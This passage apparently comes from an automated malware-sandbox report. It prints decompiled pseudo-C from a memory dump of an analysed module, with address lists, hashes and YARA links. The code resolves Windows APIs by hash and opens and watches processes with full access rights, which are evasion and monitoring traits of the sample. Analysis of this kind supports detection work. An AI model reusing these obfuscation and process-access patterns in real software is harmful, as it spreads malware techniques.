							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E7098AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E7099218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E7098F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E7098F6F0( &_v532);
				E7098B680( &_v492);
				E7098F6F0( &_v508);
				return 0;
			}

0x70989144
0x70989148
0x7098914e
0x70989150
0x70989161
0x70989164
0x7098916b
0x70989174
0x7098917b
0x7098917f
0x70989188
0x7098918f
0x70989197
0x7098919c
0x709891ab
0x709891af
0x709891c4
0x709891da
0x709891e8
0x709891e9
0x709891ea
0x709891eb
0x709891ec
0x709891f3
0x709891f7
0x70989201
0x70989216
0x7098922c
0x7098923a
0x7098923b
0x7098923c
0x7098923d
0x7098923e
0x70989245
0x70989249
0x70989253
0x70989268
0x7098927e
0x7098928c
0x7098928d
0x7098928e
0x7098928f
0x70989290
0x70989297
0x7098929b
0x709892a5
0x709892ba
0x709892d0
0x709892de
0x709892df
0x709892e0
0x709892e1
0x709892e2
0x709892e9
0x709892ed
0x709892f7
0x7098930c
0x70989322
0x70989330
0x70989331
0x70989332
0x70989333
0x70989334
0x7098933b
0x7098933f
0x70989349
0x7098935e
0x70989374
0x70989382
0x70989383
0x70989384
0x70989385
0x7098938e
0x70989390
0x7098939b
0x709893a0
0x709893a5
0x709893b1
0x709893b6
0x709893bb
0x709893c7
0x709893cc
0x709893d1
0x709893dd
0x709893e2
0x709893e7
0x709893f3
0x709893f8
0x709893fd
0x70989409
0x7098940e
0x7098941a
0x70989420
0x70989430
0x70989435
0x7098943e
0x70989447
0x7098947e
0x70989487
0x7098948c
0x70989497
0x709894a1
0x709894a7
0x709894b9
0x709894cf
0x709894dd
0x709894de
0x709894df
0x709894e0
0x709894e1
0x709894e8
0x709894f2
0x709894f8
0x7098950a
0x70989520
0x7098952e
0x7098952f
0x70989530
0x70989531
0x70989532
0x70989539
0x70989543
0x70989549
0x7098955b
0x70989571
0x7098957f
0x70989580
0x70989581
0x70989582
0x70989583
0x70989586
0x70989589
0x7098959f
0x709895a4
0x709895a8
0x709895b3
0x709895b8
0x709895bd
0x709895c9
0x709895ce
0x709895d3
0x709895e7
0x709895ef
0x709895f6
0x70989606
0x70989614
0x70989620
0x70989622
0x70989629
0x7098963c
0x70989643
0x7098965c
0x7098966a
0x70989681
0x7098968f
0x70989694
0x709896a0
0x709896ad
0x709896b4
0x709896c9
0x709896ce
0x709896d5
0x709896dc
0x709896e3
0x7098a1d7
0x7098a1de
0x7098a1ea
0x7098a1f6
0x00000000
0x7098a1f6
0x709896f0
0x709896f7
0x00000000
0x00000000
0x7098970c
0x70989711
0x70989722
0x70989727
0x70989733
0x7098973a
0x70989740
0x70989745
0x70989748
0x7098974e
0x7098975c
0x7098975d
0x70989761
0x70989765
0x70989769
0x7098977e
0x70989789
0x7098978a
0x7098978e
0x70989792
0x70989796
0x709897a0
0x709897b6
0x709897b7
0x709897bb
0x709897bf
0x709897c3
0x709897df
0x709897f5
0x709897f5
0x709897fb
0x709897fd
0x70989800
0x70989805
0x7098980c
0x70989810
0x70989814
0x7098981a
0x70989820
0x70989832
0x70989848
0x70989856
0x70989857
0x70989858
0x70989859
0x7098985a
0x70989861
0x7098986b
0x70989871
0x70989883
0x70989899
0x709898a7
0x709898a8
0x709898a9
0x709898aa
0x709898ab
0x709898b2
0x709898bc
0x709898c2
0x709898d4
0x709898ea
0x709898f8
0x709898f9
0x709898fa
0x709898fb
0x709898fc
0x70989903
0x7098990d
0x70989913
0x70989925
0x7098993b
0x70989949
0x7098994a
0x7098994b
0x7098994c
0x7098994d
0x70989950
0x70989954
0x70989958
0x7098995e
0x70989964
0x70989976
0x7098998c
0x7098999a
0x7098999b
0x7098999c
0x7098999d
0x7098999e
0x709899a5
0x709899af
0x709899b5
0x709899c7
0x709899dd
0x709899eb
0x709899ec
0x709899ed
0x709899ee
0x709899ef
0x709899f6
0x70989a00
0x70989a06
0x70989a18
0x70989a2e
0x70989a3c
0x70989a3d
0x70989a3e
0x70989a3f
0x70989a40
0x70989a47
0x70989a51
0x70989a57
0x70989a69
0x70989a7f
0x70989a8d
0x70989a8e
0x70989a8f
0x70989a90
0x70989a96
0x70989a99
0x70989a9b
0x70989aa6
0x70989aab
0x70989ab0
0x70989abf
0x70989ac4
0x70989ac9
0x70989ad8
0x70989add
0x70989ae2
0x70989af1
0x70989af6
0x70989afb
0x70989b0a
0x70989b0f
0x70989b14
0x70989b23
0x70989b28
0x70989b2d
0x70989b3c
0x70989b41
0x70989b46
0x70989b55
0x70989b5a
0x70989b63
0x70989b6b
0x70989b70
0x70989b77
0x70989b84
0x70989b86
0x7098a1bf
0x7098a1c6
0x7098a1d2
0x00000000
0x7098a1d2
0x70989b8c
0x70989b95
0x70989b98
0x70989db0
0x70989db0
0x70989dbb
0x70989ddf
0x70989de1
0x00000000
0x00000000
0x70989de7
0x70989dec
0x70989df3
0x70989e00
0x70989e02
0x00000000
0x00000000
0x70989e08
0x70989e11
0x70989e12
0x70989e14
0x70989e17
0x00000000
0x00000000
0x00000000
0x70989e19
0x70989e1e
0x70989e29
0x70989e29
0x70989e2e
0x70989e35
0x70989e3c
0x70989e43
0x70989e48
0x70989e53
0x70989e55
0x00000000
0x00000000
0x70989e5b
0x70989e60
0x70989e67
0x70989e74
0x70989e76
0x00000000
0x00000000
0x70989e7c
0x70989e85
0x70989e86
0x70989e88
0x70989e8b
0x00000000
0x00000000
0x00000000
0x70989e8d
0x70989e9b
0x70989ea3
0x70989eae
0x70989eb5
0x70989ebc
0x70989ec0
0x70989ec4
0x70989eca
0x70989ed5
0x70989ee0
0x70989ee5
0x70989ee7
0x00000000
0x00000000
0x70989eed
0x70989ef8
0x70989f0e
0x70989f1e
0x70989f20
0x00000000
0x00000000
0x70989f26
0x70989f2b
0x70989f32
0x70989f3f
0x70989f41
0x00000000
0x00000000
0x70989f47
0x70989f50
0x70989f51
0x70989f53
0x70989f56
0x00000000
0x00000000
0x00000000
0x70989f58
0x70989f5d
0x70989f68
0x70989f71
0x70989f84
0x70989f85
0x70989f8c
0x70989f93
0x70989f9a
0x70989f9b
0x70989fa6
0x70989fa8
0x00000000
0x00000000
0x70989fae
0x70989fb3
0x70989fba
0x70989fc7
0x70989fc9
0x00000000
0x00000000
0x70989fcf
0x70989fd8
0x70989fd9
0x70989fdb
0x70989fde
0x00000000
0x00000000
0x00000000
0x70989fe0
0x7098a000
0x7098a005
0x7098a007
0x00000000
0x00000000
0x7098a016
0x7098a022
0x7098a02d
0x7098a039
0x7098a043
0x7098a043
0x7098a046
0x7098a04e
0x7098a05a
0x7098a069
0x7098a071
0x7098a074
0x7098a07d
0x7098a08d
0x7098a092
0x7098a09d
0x7098a0a6
0x7098a0b9
0x7098a0ba
0x7098a0c1
0x7098a0c8
0x7098a0cf
0x7098a0d0
0x7098a0db
0x7098a0dd
0x00000000
0x00000000
0x7098a0e3
0x7098a0e8
0x7098a0ef
0x7098a0fa
0x7098a0fc
0x7098a1b3
0x7098a1ba
0x00000000
0x7098a1ba
0x7098a102
0x7098a10b
0x7098a10c
0x7098a10e
0x7098a111
0x00000000
0x00000000
0x00000000
0x7098a113
0x7098a118
0x7098a123
0x7098a123
0x7098a126
0x7098a12a
0x7098a134
0x7098a138
0x7098a13f
0x7098a14a
0x7098a14e
0x7098a158
0x7098a162
0x7098a166
0x7098a16c
0x7098a177
0x7098a179
0x00000000
0x00000000
0x7098a183
0x7098a188
0x7098a18f
0x7098a19a
0x7098a19c
0x00000000
0x00000000
0x7098a19e
0x7098a1a7
0x7098a1a8
0x7098a1aa
0x7098a1ad
0x00000000
0x00000000
0x00000000
0x7098a1ad
0x7098a200
0x7098a202
0x7098a209
0x7098a20e
0x7098a211
0x7098a21f
0x7098a230
0x7098a23c
0x7098a248
0x7098a254
0x7098a260
0x7098a26c
0x7098a275
0x7098a27e
0x7098a287
0x7098a28e
0x00000000
0x7098a290
0x70989b9e
0x70989ba9
0x70989bb2
0x70989bb7
0x70989bc3
0x70989bc4
0x70989bd4
0x70989be2
0x70989bf5
0x70989c01
0x70989c0d
0x70989c19
0x70989c20
0x70989c23
0x70989c2e
0x70989c30
0x70989cdb
0x70989cdb
0x70989cde
0x70989ce7
0x70989ceb
0x70989cef
0x70989cf5
0x70989cf9
0x70989d05
0x70989d0f
0x70989d13
0x70989d19
0x70989d1f
0x70989d24
0x70989d26
0x70989d3e
0x70989d4a
0x70989d5e
0x70989d63
0x70989d6c
0x70989d6f
0x00000000
0x00000000
0x70989d75
0x70989d7a
0x70989d81
0x70989d8e
0x70989d90
0x00000000
0x00000000
0x00000000
0x70989d90
0x70989d28
0x70989d2f
0x00000000
0x70989d2f
0x70989c36
0x70989c41
0x70989c4f
0x70989c54
0x70989c56
0x70989c59
0x70989c62
0x70989c66
0x70989c6e
0x70989c74
0x70989c78
0x70989c7e
0x70989c8b
0x70989c8f
0x70989c93
0x70989c9b
0x70989ca1
0x70989ca6
0x70989ca8
0x00000000
0x00000000
0x70989cac
0x70989cad
0x70989cb2
0x70989cbc
0x70989cc3
0x70989cce
0x70989cd5
0x00000000
0x00000000
0x00000000
0x70989cd5
0x00000000
0x70989d96
0x70989d96
0x70989d9f
0x70989da0
0x70989da2
0x70989da2
0x00000000
0x70989dab
0x70989449
0x7098944d
0x70989456
0x7098945f
0x00000000

Strings

$EA, xrefs: 709891E1

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: afbb6431558f1283b7e070ba1684ccb8c11579fa247227139919ce829ca87fc4
Instruction ID: a207beadfedfbe1f05b8577120857ebf2adaba0d659666e1bd46168d2d96218d
Opcode Fuzzy Hash: afbb6431558f1283b7e070ba1684ccb8c11579fa247227139919ce829ca87fc4
Instruction Fuzzy Hash: 6BA26B714187419ED721DF24C851BEEB7F4AFA6304F108A2DB4999B2A1FF30A949CB53

Uniqueness

Uniqueness Score: -1.00%

Function 7098A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E7098A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E7098B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E7098F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E7098F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E7099218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E7098F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E7098F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E7098F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x7099b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E70992F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E7098F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E7098F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E7098B680(_t439 + 0x34);
											E7098B680(_t439 + 8);
											goto L65;
										}
										L62:
										E7098B680(_t439 + 0x34);
										E7098B680(_t439 + 8);
										goto L63;
									}
									_t392 = E7098F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E7098CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E7098C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E7098F8C4(_t439 + 0x14, E7098F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E7098F558(_t439 + 0x14, E7098F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E70992F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E7098F8C4(_t439 + 0x40, E7098F568(_t439 + 0x3c) + 4);
											 *(E7098F558(_t439 + 0x40, E7098F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E7098CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E7098F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E7098F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E7098AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E7098CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E7098F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E7098F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E7098F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E7098F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E7098F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E7099382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7098F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E7098F8C4( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E7098F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E7098F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E7098F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E7098F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E7099382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7098F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E7098F8C4( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E7098F8C4( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E7098F558( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E7098F8C4( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 4);
								 *(E7098F558( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E7098F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E70992F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7098F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E7098F8C4( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E7098F558( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E7098F558(_t439 + 0x28,  *(_t439 + 0x70));
										E7098F8C4( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 4);
										 *(E7098F558( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7098F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E7098F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E7098F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E7098F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E7098F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E7098F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E7099382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7098F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E7098F8C4( *((intOrPtr*)(_t439 + 4)), E7098F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E70992F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E7098F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E7098F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E7098F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E7098F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E7098F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E7099382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7098F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E7098F8C4( *((intOrPtr*)(_t439 + 8)), E7098F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7098F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x7098a5ae
0x7098a5b0
0x7098a5bb
0x7098a5c1
0x7098a5c5
0x7098a5ca
0x7098a5d0
0x7098a5e0
0x00000000
0x7098a5e2
0x7098a5e2
0x7098a5ed
0x7098a5ed
0x7098ab6b
0x7098ab6d
0x7098ab6e
0x7098abad
0x7098abb1
0x7098abbf
0x7098abcd
0x7098abcd
0x7098abb8
0x7098abd3
0x7098abd8
0x00000000
0x7098abd8
0x7098abbc
0x7098abbd
0x00000000
0x7098a5f7
0x7098a5f7
0x7098a5fb
0x7098a702
0x7098a702
0x7098a707
0x7098a818
0x7098a81c
0x7098a821
0x7098a825
0x7098a94f
0x7098a951
0x7098a955
0x7098a95e
0x7098a967
0x7098a96b
0x7098a974
0x7098a97b
0x7098a97c
0x7098a980
0x7098a984
0x7098a988
0x7098a98a
0x7098aaf4
0x7098aaf4
0x7098aafc
0x7098ab14
0x7098ab16
0x7098ab18
0x7098ab52
0x7098ab52
0x7098ab54
0x7098ab54
0x7098ab57
0x7098ab72
0x7098ab86
0x7098ab89
0x7098ab8e
0x7098ab99
0x7098ab9a
0x7098ab9d
0x7098ab9f
0x7098aba8
0x00000000
0x7098aba8
0x7098ab59
0x7098ab5d
0x7098ab66
0x00000000
0x7098ab66
0x7098ab29
0x7098ab39
0x7098ab3d
0x7098ab3d
0x7098ab40
0x7098ab43
0x7098ab46
0x7098ab4c
0x00000000
0x00000000
0x00000000
0x7098ab4e
0x7098a992
0x7098a992
0x7098a994
0x7098a998
0x7098a99d
0x7098a99f
0x7098a9a3
0x7098a9a6
0x7098a9ae
0x7098a9b0
0x00000000
0x00000000
0x7098a9c7
0x7098a9e2
0x7098a9e4
0x7098a9f7
0x7098a9f9
0x7098a9fb
0x7098aa16
0x7098aa16
0x7098aa1a
0x7098aa1c
0x00000000
0x00000000
0x7098aa1e
0x7098aa21
0x7098aa42
0x7098aa61
0x7098aa67
0x7098aa6a
0x7098aa6f
0x7098aa70
0x7098aa74
0x00000000
0x00000000
0x7098aa7c
0x7098aa7c
0x7098aa7e
0x7098aa8a
0x7098aa96
0x7098aaa0
0x7098aaa3
0x7098aaa6
0x7098aaaa
0x7098aab1
0x7098aab5
0x7098aab9
0x7098aaba
0x7098aabe
0x7098aac3
0x7098aac8
0x7098aacc
0x7098aad0
0x7098aad6
0x7098aadc
0x7098aae2
0x7098aae8
0x7098aaed
0x7098aaee
0x7098aaee
0x00000000
0x7098aa7e
0x00000000
0x7098aa21
0x7098a9ff
0x7098aa10
0x7098aa12
0x7098aa14
0x00000000
0x00000000
0x00000000
0x7098aa14
0x7098aa27
0x00000000
0x7098aa27
0x7098a82b
0x7098a82e
0x7098a830
0x00000000
0x00000000
0x7098a838
0x7098a838
0x7098a83a
0x7098a83a
0x7098a84b
0x7098a84d
0x7098a850
0x00000000
0x00000000
0x7098a946
0x7098a947
0x7098a949
0x00000000
0x00000000
0x00000000
0x7098a949
0x7098a856
0x7098a859
0x7098a863
0x7098a868
0x7098a86a
0x7098a870
0x7098a877
0x7098a87b
0x7098a880
0x7098a884
0x7098acbf
0x7098acd3
0x7098acf6
0x7098acfb
0x7098acfb
0x7098a89b
0x7098a8a0
0x7098a8a0
0x7098a8a0
0x7098a8a0
0x7098a8a6
0x7098a8ab
0x7098a8ad
0x7098a8b2
0x7098a8b9
0x7098a8be
0x7098a8c0
0x7098ac7d
0x7098ac8e
0x7098aca8
0x7098acad
0x7098acad
0x7098a8d6
0x7098a8db
0x7098a8db
0x7098a8db
0x7098a8db
0x7098a8ef
0x7098a90d
0x7098a912
0x7098a922
0x7098a93f
0x7098a941
0x7098a941
0x00000000
0x7098a859
0x7098a70f
0x7098a70f
0x7098a711
0x7098a718
0x7098a726
0x7098a728
0x7098a72b
0x7098a732
0x7098a734
0x7098a765
0x7098a774
0x7098a776
0x7098a778
0x7098a796
0x7098a798
0x7098a79a
0x7098a7ad
0x7098a7cc
0x7098a7d2
0x7098a7d5
0x7098a7ec
0x7098a808
0x7098a80a
0x7098a80a
0x7098a80a
0x7098a80a
0x7098a79a
0x00000000
0x7098a778
0x7098a738
0x7098a738
0x7098a73a
0x7098a74b
0x7098a74d
0x7098a74f
0x00000000
0x00000000
0x7098a75b
0x7098a75c
0x7098a763
0x00000000
0x00000000
0x00000000
0x7098a763
0x7098a751
0x7098a754
0x00000000
0x00000000
0x7098a80d
